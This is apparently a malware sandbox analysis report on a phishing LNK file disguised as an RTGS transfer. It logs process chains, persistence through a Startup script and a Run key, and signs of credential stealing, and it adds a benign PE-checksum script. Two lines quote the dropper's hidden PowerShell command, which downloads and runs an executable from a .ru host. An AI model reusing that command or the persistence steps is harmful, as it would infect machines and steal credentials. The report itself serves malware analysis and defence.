Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: RTGS-WB-ABS-240730-NEW.lnk | LNK file: -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oootorgline.ru/components/grace.exe -OutFile %TEMP%\file.exe; Start-Process '%TEMP%\file.exe' }"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0167F268
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01674BD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0167BC10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01673FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01674308
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_06E55877
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_06E53018
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_06E5B1C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_06E56188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_06E55150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_06E5C130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_06E57918
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_06E57238
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_06E5E358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_06E50040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_06E5001F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_00DEF268
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_00DE4308
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_00DEB440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_00DE4BD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_00DEBC10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_00DE3FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_00DE0D24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_06632348
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_06635150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_0663C130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_06637918
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_0663B1D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_06636188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_06637238
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_0663E358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_06630040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_06635888
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_06630023
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_06630007
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winLNK@17/13@8/5
Source: C:\Users\user\AppData\Local\Temp\file.exe | File created: C:\Users\user\AppData\Local\unspattered
Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3504:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:884:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_duy0shnp.1z5.ps1
Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\recomplaint.vbs"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: RTGS-WB-ABS-240730-NEW.lnk | ReversingLabs: Detection: 23%
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oootorgline.ru/components/grace.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\file.exe "C:\Users\user\AppData\Local\Temp\file.exe"
Source: C:\Users\user\AppData\Local\Temp\file.exe | Process created: C:\Users\user\AppData\Local\unspattered\recomplaint.exe "C:\Users\user\AppData\Local\Temp\file.exe"
Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\file.exe"
Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\recomplaint.vbs"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\unspattered\recomplaint.exe "C:\Users\user\AppData\Local\unspattered\recomplaint.exe"
Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\unspattered\recomplaint.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe "C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe"
Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe "C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe"
Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: taskflowdatauser.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\file.exe | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\file.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\file.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\file.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\file.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\file.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\file.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\file.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exe | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exe | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: RTGS-WB-ABS-240730-NEW.lnk | LNK file: ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                    Source: Binary string: RegSvcs.pdb, source: aWUFv.exe, 0000000D.00000000.2622184453.0000000000502000.00000002.00000001.01000000.00000009.sdmp, aWUFv.exe.8.dr
                    Source: Binary string: wntdll.pdbUGP source: recomplaint.exe, 00000007.00000003.2386568009.0000000004530000.00000004.00001000.00020000.00000000.sdmp, recomplaint.exe, 00000007.00000003.2387078782.00000000046D0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: recomplaint.exe, 00000007.00000003.2386568009.0000000004530000.00000004.00001000.00020000.00000000.sdmp, recomplaint.exe, 00000007.00000003.2387078782.00000000046D0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: RegSvcs.pdb source: aWUFv.exe, 0000000D.00000000.2622184453.0000000000502000.00000002.00000001.01000000.00000009.sdmp, aWUFv.exe.8.dr

                    Data Obfuscation

                    Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oootorgline.ru/components/grace.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }"
                    Source: recomplaint.exe.3.dr | Static PE information: real checksum: 0xa961f should be: 0x1473cb
                    Source: file.exe.0.dr | Static PE information: real checksum: 0xa961f should be: 0x1473cb
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_01670C6D push edi; retf 8_2_01670C7A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_00DE0CCC push edi; retf 12_2_00DE0C7A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_00DE0C6D push edi; retf 12_2_00DE0C7A
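The two "real checksum ... should be" rows above report the same stored value (0xa961f) and the same recomputed value (0x1473cb) for file.exe and recomplaint.exe, which is consistent with recomplaint.exe being a plain copy of the downloaded file, and a non-zero stored CheckSum that no longer matches the bytes is the usual footprint of a binary modified after linking, typically by a packer or crypter. The Python below is an added example, not code from the Joe Sandbox report or from the sample, showing how that check is done: it recomputes the PE optional-header CheckSum (the Microsoft algorithm: fold every dword except the CheckSum field itself into 16 bits, then add the file length) and compares it with the stored field. The `minimal_pe_image` helper and the values it produces are this example's own constructed test input, a header-only buffer that is not a runnable executable.

```python
"""Recompute a PE file's optional-header CheckSum and compare it with the stored one."""
import struct


def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """Microsoft PE CheckSum: sum all little-endian dwords except the CheckSum field,
    carrying overflow back in, fold to 16 bits, then add the file length."""
    padded = data + b"\x00" * (-len(data) % 4)      # pad to a dword boundary
    total = 0
    for i in range(0, len(padded), 4):
        if i == checksum_offset:                    # the field itself is skipped
            continue
        total += struct.unpack_from("<I", padded, i)[0]
        if total > 0xFFFFFFFF:                      # end-around carry
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total = total + (total >> 16)
    total &= 0xFFFF
    return total + len(data)


def checksum_field_offset(data: bytes) -> int:
    """Locate IMAGE_OPTIONAL_HEADER.CheckSum: e_lfanew + 4 (PE\\0\\0) + 20 (COFF) + 64.
    The 64-byte offset is the same for PE32 (0x10b) and PE32+ (0x20b)."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    magic = struct.unpack_from("<H", data, e_lfanew + 24)[0]
    if magic not in (0x10B, 0x20B):
        raise ValueError(f"unknown optional header magic {magic:#x}")
    return e_lfanew + 4 + 20 + 64


def checksum_status(data: bytes) -> tuple[int, int, bool]:
    """Return (stored, computed, matches). Stored == 0 just means the linker never wrote
    one (common outside drivers); a non-zero stored value that differs from the
    recomputed one means the file was changed after linking, which is what the
    sandbox row flags."""
    off = checksum_field_offset(data)
    stored = struct.unpack_from("<I", data, off)[0]
    computed = pe_checksum(data, off)
    return stored, computed, stored == computed


def fix_checksum(data: bytes) -> bytes:
    """Write the recomputed CheckSum back (what a linker or 'editbin /RELEASE' does)."""
    off = checksum_field_offset(data)
    return data[:off] + struct.pack("<I", pe_checksum(data, off)) + data[off + 4:]


def minimal_pe_image(size: int = 512, stored_checksum: int = 0) -> bytes:
    """Constructed test input (assumption, not a real executable): MZ stub, PE
    signature at 0x40, PE32 magic, CheckSum at 0x98, everything else zero."""
    buf = bytearray(size)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)          # e_lfanew
    buf[0x40:0x44] = b"PE\x00\x00"
    struct.pack_into("<H", buf, 0x40 + 24, 0x10B)    # optional header magic (PE32)
    struct.pack_into("<I", buf, 0x40 + 88, stored_checksum)
    return bytes(buf)


if __name__ == "__main__":
    import sys
    image = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else minimal_pe_image()
    stored, computed, ok = checksum_status(image)
    print(f"stored={stored:#x} computed={computed:#x} {'OK' if ok else 'MISMATCH'}")
```

Run it against a dropped file (`python pe_checksum.py file.exe`) to reproduce the report's "real checksum / should be" pair. Because the file length is part of the sum, two files with the same stored and the same recomputed value, as here, are very likely byte-identical rather than merely similar.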

                    Persistence and Installation Behavior

                    Source: LNK file | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Source: C:\Users\user\AppData\Local\Temp\file.exe | File created: C:\Users\user\AppData\Local\unspattered\recomplaint.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File created: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\file.exe

                    Boot Survival

                    Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\recomplaint.vbs
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run aWUFv

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
